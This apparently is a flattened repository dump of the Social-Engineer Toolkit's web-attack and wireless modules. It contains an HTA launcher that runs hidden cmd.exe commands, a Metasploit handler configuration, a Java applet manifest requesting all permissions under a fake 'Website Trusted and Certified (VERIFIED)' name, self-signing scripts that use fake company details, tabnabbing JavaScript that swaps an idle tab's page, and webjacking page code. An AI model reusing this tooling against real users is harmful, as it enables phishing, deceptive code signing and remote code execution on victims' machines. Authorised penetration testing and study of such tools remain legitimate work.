ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n""" % (command) 31 | main2 = """""" 32 | 33 | # metasploit answer file here 34 | filewrite = file(setdir + "/meta_config", "w") 35 | filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port)) 36 | filewrite.close() 37 | 38 | # write out main1 and main2 39 | filewrite = file(setdir + "/hta_index", "w") 40 | filewrite.write(main2) 41 | filewrite.close() 42 | 43 | # write out launcher.hta 44 | filewrite = file(setdir + "/Launcher.hta", "w") 45 | filewrite.write(main1) 46 | filewrite.close() 47 | 
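-------------------------------------------------------------------------------- /src/webattack/java_applet/manifest.mf: -------------------------------------------------------------------------------- 1 | Permissions: all-permissions 2 | Codebase: * 3 | Application-Name: Website Trusted and Certified (VERIFIED) 4 | -------------------------------------------------------------------------------- /src/webattack/java_applet/sign.sh: -------------------------------------------------------------------------------- 1 | cp ../../html/unsigned/unsigned.jar Java_Exploit.jar 2 | jar ufm Java_Exploit.jar manifest.mf 3 | jarsigner -storetype pkcs12 -keystore /root/certs/MyCert.pfx Java_Exploit.jar "1" 4 | cp Java_Exploit.jar Signed_Update.jar.orig 5 | cp Java_Exploit.jar ../../html/Signed_Update.jar.orig 6 | -------------------------------------------------------------------------------- /src/webattack/java_applet/sign_jar.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
#
# Self-sign Java_Obf.jar and copy the result into the html directory.
#
# Steps, in order:
#   1. keytool creates a key pair under the alias "signapplet2" in a local
#      keystore file named "mykeystore" (it prompts for the certificate
#      fields listed in the banner below).
#   2. jarsigner signs Java_Obf.jar with that key and writes
#      Signed_Update.jar.
#   3. The signed jar replaces ../../html/Signed_Update.jar.orig and the
#      unsigned jar is copied to ../../html/unsigned/unsigned.jar.
#
# NOTE(review): the certificate produced here is self-signed, so every
# field typed at the keytool prompt is unverified.  A publisher name on a
# jar signed this way is not evidence of who produced it.
# NOTE(review): the keystore and key passwords are fixed strings passed on
# the command line, where other local users can typically read them from
# the process list.  Treat "mykeystore" as a throwaway file and never reuse
# it for a key that matters.
#
import subprocess
import os


def _shell(command):
    """Run *command* through the shell; return True when it exits with 0."""
    return subprocess.call(command, shell=True) == 0


try:
    print("""
Simply enter in the required fields, easy example below:

Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes

""")
    print("""*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***""")

    # keytool exits non-zero when the alias already exists in mykeystore;
    # jarsigner can still use the existing key, so this status is not fatal.
    _shell("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass")

    # self-sign the applet
    signed = _shell("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2")

    copied = False
    if signed:
        # rm exits non-zero when no earlier copy exists; that is expected
        # on a first run, so its status is ignored.
        _shell("rm ../../html/Signed_Update.jar.orig")
        signed_copied = _shell("cp Signed_Update.jar ../../html/Signed_Update.jar.orig")
        unsigned_copied = _shell("cp Java_Obf.jar ../../html/unsigned/unsigned.jar")
        copied = signed_copied and unsigned_copied

    # Only report success when signing and both copies really succeeded;
    # the earlier version printed the success line unconditionally.
    if signed and copied:
        print("[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)")
    else:
        print("[!] Signing or copying failed; the java applet was not imported. Check the keytool/jarsigner output above.")
except KeyboardInterrupt:
    # The operator aborted at an interactive prompt; exit quietly as before.
    pass
except OSError as err:
    # Previously hidden by a bare "except: pass".
    print("[!] Could not run an external command: %s" % err)
-------------------------------------------------------------------------------- /src/webattack/java_applet/unsigned.py: --------------------------------------------------------------------------------
#!/usr/bin/python
#
# Rebuild Java_Update.jar from Java.java, merge manifest.mf into it and copy
# it to ../../html/unsigned/unsigned.jar.
#
# NOTE(review): manifest.mf (listed earlier on this page) requests
# all-permissions with a wildcard Codebase, and its Application-Name is free
# text chosen by the author.  None of these fields is evidence of trust.
#
import subprocess
import os

# Remove the previous build products first.  communicate() drains the pipes
# and waits for rm to finish; without the wait, rm could still be running
# when javac/jar recreate the same files.
for stale in ("rm Java_Update.jar", "rm Java.class"):
    subprocess.Popen(stale, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).communicate()

build_steps = (
    "javac Java.java",
    "jar cvf Java_Update.jar Java.class",
    "jar ufm Java_Update.jar manifest.mf",
    "cp Java_Update.jar ../../html/unsigned/unsigned.jar",
)

# Stop at the first failing step so a broken build is not reported as
# exported; the final cp is now waited on as well.
failed = None
for step in build_steps:
    if subprocess.call(step, shell=True) != 0:
        failed = step
        break

if failed is None:
    print("[*] Jar file exported as Java_Update.jar")
else:
    print("[!] Build stopped: '%s' exited with an error" % failed)
-------------------------------------------------------------------------------- /src/webattack/mlitm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/mlitm/__init__.py -------------------------------------------------------------------------------- /src/webattack/multi_attack/__init__.py: --------------------------------------------------------------------------------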
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/multi_attack/__init__.py -------------------------------------------------------------------------------- /src/webattack/profiler/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/profiler/__init__.py -------------------------------------------------------------------------------- /src/webattack/profiler/webprofiler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # victim profile code here 4 | # 5 | 6 | from src.core.setcore import return_continue, print_info 7 | 8 | def prep_website(): 9 | print_info("This feature is currently under development and disabled.") 10 | return_continue() 11 | 12 | prep_website() 13 | -------------------------------------------------------------------------------- /src/webattack/tabnabbing/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/tabnabbing/__init__.py -------------------------------------------------------------------------------- /src/webattack/tabnabbing/source.js: -------------------------------------------------------------------------------- 1 | (function(){ 2 | 3 | var TIMER = null; 4 | var HAS_SWITCHED = false; 5 | 6 | window.onblur = function(){ 7 | TIMER = setTimeout(changeItUp, 1000); 8 | } 9 | 10 | window.onfocus = function(){ 11 | if(TIMER) clearTimeout(TIMER); 12 | } 13 | 14 | favicon = { 15 | docHead: document.getElementsByTagName("head")[0], 16 
| set: function(url){ 17 | this.addLink(url); 18 | }, 19 | 20 | addLink: function(iconURL) { 21 | var link = document.createElement("link"); 22 | link.type = "image/x-icon"; 23 | link.rel = "shortcut icon"; 24 | link.href = iconURL; 25 | this.removeLinkIfExists(); 26 | this.docHead.appendChild(link); 27 | }, 28 | 29 | removeLinkIfExists: function() { 30 | var links = this.docHead.getElementsByTagName("link"); 31 | for (var i=0; i\n') 73 | filewrite1.write("\n") 74 | filewrite1.write("Please wait while the site loads...\n") 75 | filewrite1.write("\n") 76 | filewrite1.close() 77 | 78 | # define webjacking or multi webjacking here 79 | if attack_vector == "webjacking" or multi_webjacking == "on": 80 | filewrite1=file(setdir + "/web_clone/index.html", "w") 81 | filewrite1.write("\n") 86 | filewrite1.write('''

The site %s has moved, click here to go to the new location.

\n''' % (URL,webjacking_timing,URL)) 87 | filewrite1.close() 88 | -------------------------------------------------------------------------------- /src/webattack/web_clone/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/web_clone/__init__.py -------------------------------------------------------------------------------- /src/webattack/web_clone/applet.database: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/webattack/web_clone/applet.database.old: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/webattack/web_clone/applet.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | // 1 = WINDOWSPLZ 5 | // 2 = ILIKESTUFF 6 | // 3 = OSX 7 | // 4 = LINUX 8 | // 5 = X64 9 | // 6 = X86 10 | // 7 = HUGSNOTDRUGS 11 | // 8 = LAUNCH 12 | // 9 = nextPage 13 | 14 | 15 | -------------------------------------------------------------------------------- /src/webattack/web_clone/repeater.database: -------------------------------------------------------------------------------- 1 | 29 | -------------------------------------------------------------------------------- /src/webattack/web_clone/unc.database: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/wireless/__init__.py: -------------------------------------------------------------------------------- 
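#!/usr/bin/env python
# src/wireless/stop_wifiattack.py
#
# Simple python script to kill things created by the SET wifi attack vector.
#
# Teardown only: it reloads the rtl8187 driver and resets rfkill, brings the
# chosen interface up, kills airbase-ng, dhcpd3, dhclient3 and dnsspoof,
# writes 0 to ip_forward and asks airmon-ng to stop monitor mode.
# Every step is best-effort; a failing command does not stop the later ones.

import re
import subprocess
from src.core.setcore import *

# Conservative shape for a Linux interface name: starts with a letter or
# digit, at most 15 characters, and none of the characters a shell or an
# option parser would treat specially (no spaces, ';', '|', '$', leading '-').
_IFACE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.:-]{0,14}$")

interface = raw_input(setprompt(["8"], "Enter your wireless interface (ex: wlan0): ")).strip()

# fix a bug if present
print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
# Constant command string: nothing typed by the operator is interpolated here.
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all", shell=True).wait()

# The interface name is operator input and these commands typically run with
# root privileges, so it is validated and passed as a separate argv element
# instead of being formatted into a shell=True command line.
if _IFACE_RE.match(interface):
    try:
        subprocess.Popen(["ifconfig", interface, "up"]).wait()
    except OSError as err:
        # Keep the original best-effort behaviour when ifconfig is missing.
        print_status("Could not run ifconfig: %s" % err)
else:
    print_status("Skipping 'ifconfig up': %r does not look like an interface name." % interface)

print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()

print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()

print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()

print_status("Turning off IP_forwarding...")
# The shell is needed for the redirect; the string is a constant.
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait()

# NOTE(review): mon0 and wlan0 are hard-coded in the next two calls; the
# interface entered above is not used for them. The airmon-ng path is
# relative, so this presumably expects to be started from the SET root
# directory -- confirm against the caller.
print_status("Killing monitor mode on mon0...")
subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait()

print_status("Turning off monitor mode on wlan0...")
subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait()

print_status("SET has stopped the wireless access point. ")
return_continue()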